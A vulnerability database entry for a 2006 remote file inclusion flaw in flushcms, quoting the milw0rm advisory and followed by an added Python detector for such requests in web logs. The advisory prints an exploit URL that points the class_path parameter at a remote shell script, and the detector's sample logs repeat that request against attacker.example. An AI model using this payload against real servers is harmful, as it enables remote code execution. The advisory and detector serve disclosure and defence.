Vendor: flushcms
By: igi
CVSS: 7.5 (HIGH)
Remote File Inclusion
CWE: 94
Product Name: flushcms
Affected Version From: flushcms (tpath) 1.0
Affected Version To: flushcms (tpath) 1.0
Patch Exists: YES
Related CVE: CVE-2006-3730
CPE: a:tpath:flushcms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2006

flushcms (tpath) Remote File Inclusion Vulnerability

flushcms (tpath) is prone to a remote file-inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the vulnerable application.

Mitigation:

Upgrade to the latest version of flushcms (tpath)

Exploit-DB raw data:

flushcms  (tpath) Remote File Inclusion Vulnerability

virangar security team
www.virangar.org
www.virangar.net
Discovered By : igi
contact  :  anti_hacker_online@yah00.com
for all member  virangar

bug:
----------------------------------------------------------------------------------------
//language class
require_once($class_path.'rich_files/lang/class.rich_lang.php');
-----------------------------------------------------------------------------------------

simple:http://www.site.com/flushcmd/Include/editor/rich_files/class.rich.php?class_path=http://www.shell.com/shell.txt?

# milw0rm.com [2006-07-16]
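
Detection for the request shape shown in the advisory, as an added example that is not part of the original advisory or of flushcms: it scans web server access logs for PHP requests whose query parameters carry a remote URL, and labels hits on the `class_path` parameter of `class.rich.php` separately. The function names, labels and log lines are constructed for illustration, and the logs are assumed to be in Common/Combined Log Format.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# A parameter value that starts with a remote URL scheme.
REMOTE = re.compile(r"^\s*(?:https?|ftps?)://", re.I)
# Request field of a Common/Combined Log Format line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Script and parameter named in the advisory above.
KNOWN_SCRIPT = "rich_files/class.rich.php"
KNOWN_PARAM = "class_path"

def classify(target):
    """Return [(label, param, value)] for URL-valued parameters sent to a PHP script."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    if not path.endswith(".php"):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; this catches double encoding
        if REMOTE.match(value):
            known = path.endswith(KNOWN_SCRIPT) and name == KNOWN_PARAM
            hits.append(("flushcms-class_path" if known else "generic-rfi", name, value))
    return hits

def scan(lines):
    """Return [(line_number, label, param, value)] for every suspicious request."""
    found = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            found += [(number, *hit) for hit in classify(match.group("target"))]
    return found

# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Jul/2006:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 1043',
    '192.0.2.44 - - [16/Jul/2006:10:00:05 +0000] "GET /flushcmd/Include/editor/'
    'rich_files/class.rich.php?class_path=http://attacker.example/x.txt? HTTP/1.1" 200 77',
    '192.0.2.44 - - [16/Jul/2006:10:00:09 +0000] "GET /Include/editor/rich_files/'
    'class.rich.php?class_path=http%253A%252F%252Fattacker.example%252Fx.txt HTTP/1.0" 200 77',
    '198.51.100.7 - - [16/Jul/2006:10:01:00 +0000] "GET /go.php?url=ftp://files.example/a HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Hits labelled `generic-rfi` include legitimate redirect-style parameters and need triage; hits labelled `flushcms-class_path` match the script and parameter from the advisory.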